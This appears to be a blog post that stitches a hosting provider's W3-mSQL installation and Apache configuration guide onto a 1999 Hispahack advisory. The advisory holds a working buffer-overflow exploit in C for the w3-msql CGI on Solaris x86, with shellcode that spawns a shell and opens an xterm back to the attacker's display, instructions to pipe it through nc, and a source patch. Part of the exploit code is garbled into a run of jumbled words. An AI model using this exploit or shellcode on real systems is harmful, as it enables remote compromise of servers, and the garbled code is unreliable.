W3-mSQL provides a programmatic interface to the mSQL database system from within an HTML document. It enables the development of entire programs within a Web page while offering comprehensive access control and security features.
Installation
To install W3-mSQL on your Virtual Private Server, connect to your server via Telnet or SSH and do the following, according to your server O/S:
-
% vinstall w3-msql % chmod 755 ~/www/cgi-bin/w3-auth ~/www/cgi-bin/w3-msql - If you don't know the Virtual Private Server O/S, try the following:
Configuration
W3-mSQL enhanced HTML files must be pre-processed by the ~/www/cgi-bin/w3-msql CGI before the web server sends the results to the requesting client. Normally, this pre-processing requires the ~/www/cgi-bin/w3-msql CGI to appear in the URL of each W3-mSQL file on your site. For example:
http://YOUR-DOMAIN.NAME/cgi-bin/w3-msql/file.msql
The Apache Web Server can be configured to automatically pre-process W3-mSQL files with the .msql file extension. To setup W3-mSQL redirection, add the following lines to the ~/www/conf/httpd.conf file (or the ~/www/conf/srm.conf file, if you server was configured before Dec. 8, 1998):
AddHandler htmsql msql
Action htmsql /cgi-bin/w3-msql
After doing this, it is possible to access W3-mSQL files this way:
http://YOUR-DOMAIN.NAME/file.msql
The .msql files are automatically pre-processed by the ~/www/cgi-bin/w3-msql CGI without the ~/www/cgi-bin/w3-msql CGI appearing in the URL path.
Sample Application
A sample W3-mSQL application is also available for installation on the Virtual Private Servers. You can install the simple example by unpacking an archive file.
A sample W3-mSQL application is also available for installation on the Virtual Private Servers. You can install the simple example by unpacking an archive file.
% cd
% tar xvf /usr/local/contrib/w3-msql-demo.tar
Once the files are in place run the install script.
% cd ~/www/htdocs/bookmarks
% ./setup_bookmark
You can then access the sample application at:
http://YOUR-DOMAIN.NAME/bookmarks/Welcome.html
* !Hispahack Research Team * http://hispahack.ccc.de * * Xploit for /cgi-bin/w3-msql (msql 2.0.4.1 - 2.0.11) * * Platform: Solaris x86 * Feel free to port it to other arquitectures, if you can... * If so mail me plz. * * By: Zhodiac* * Steps: 1) gcc -o w3-msql-xploit w3-msql-xploit.c * 2) xhost + * 3) ./w3-msql-xploit | nc * 4) Take a cup of cofee, some kind of drug or wathever * estimulates you at hacking time... while the xterm is comming * or while you are getting raided. * * #include * * Madrid, 28/10/99 * * Spain r0x * */ #include #include #include /******************/ /* Customize this */ /******************/ //#define LEN_VAR 50 /* mSQL 2.0.4 - 2.0.10.1 */ #define LEN_VAR 128 /* mSQL 2.0.11 */ // Solaris x86 #define ADDR 0x8045f8 // Shellcode Solaris x86 char shellcode[]= /* By Zhodiac */ "\x8b\x74\x24\xfc\xb8\x2e\x61\x68\x6d\x05\x01\x01\x01\x01\x39\x06" "\x74\x03\x46\xeb\xf9\x33\xc0\x89\x46\xea\x88\x46\xef\x89\x46\xfc" "\x88\x46\x07\x46\x46\x88\x46\x08\x4e\x4e\x88\x46\xff\xb0\x1f\xfe" "\xc0\x88\x46\x21\x88\x46\x2a\x33\xc0\x89\x76\xf0\x8d\x5e\x08\x89" "\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x50\x8d\x5e\xf0\x53\x56\x56\xb0" "\x3b\x9a\xaa\xaa\xaa\xaa\x07\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" "\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" "/bin/shA-cA/usr/openwin/bin/xtermA-displayA"; #define ADDR_TIMES 12 #define BUFSIZE LEN_VAR+15*1024+LEN_VAR+ADDR_TIMES*4-16 #define NOP 0x90 int main (int argc, char *argv[]) { char *buf, *ptr; long addr=ADDR; int aux; if (argc<3 0x000000ff="" 0x0000ff00="" 80="" addr="" amp="" argv="" aux="0;aux<ADDR_TIMES;aux++)" buf="" char="" display="" exit="" for="" if="" malloc="" memcpy="" memset="" n="" nc="" perror="" printf="" ptr="" s="" sage:="" shellcode="" strlen="" target="">> 8; ptr[2] = (addr & 0x00ff0000) >> 16; ptr[3] = (addr & 0xff000000) >> 24; ptr+=4; } printf("POST /cgi-bin/w3-msql/index.html HTTP/1.0\n"); printf("Connection: Keep-Alive\n"); printf("User-Agent: Mozilla/4.60 [en] (X11; I; Linux 2.0.38 i686\n"); printf("Host: %s\n",argv[1]); printf("Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg\n"); printf("Accept-Encoding: gzip\n"); printf("Accept-Language: en\n"); printf("Accept-Charset: iso-8859-1,*,utf-8\n"); printf("Content-type: multipart/form-data\n"); printf("Content-length: %i\n\n",BUFSIZE); printf("%s \n\n\n",buf); free(buf); } ------- w3-msql-xploit.c --------- - Fix: ====== Best solution is to wait for a new patched version, meanwhile here you have a patch that will stop this attack and some other (be aware that this patch was done after a total revision of the code, maybe there are some other overflows). ------ w3-msql.patch --------- 410c410 < scanf("%s ", boundary); --- > scanf("%128s ", boundary); 418c418 < strcat(var, buffer); --- > strncat(var, buffer,sizeof(buffer)); 428c428 < scanf(" Content-Type: %s ", buffer); --- > scanf(" Content-Type: %15360s ", buffer); ------ w3-msql.patch --------- piscis:~# patch w3-msql.c w3-msql.patch piscis:~# Spain r0x Greetz :) Zhodiac
http://lwn.net/1999/1230/a/msql.html
https://www.teamits.com/internet/support/vps/msql/w3msql.html
No comments:
Post a Comment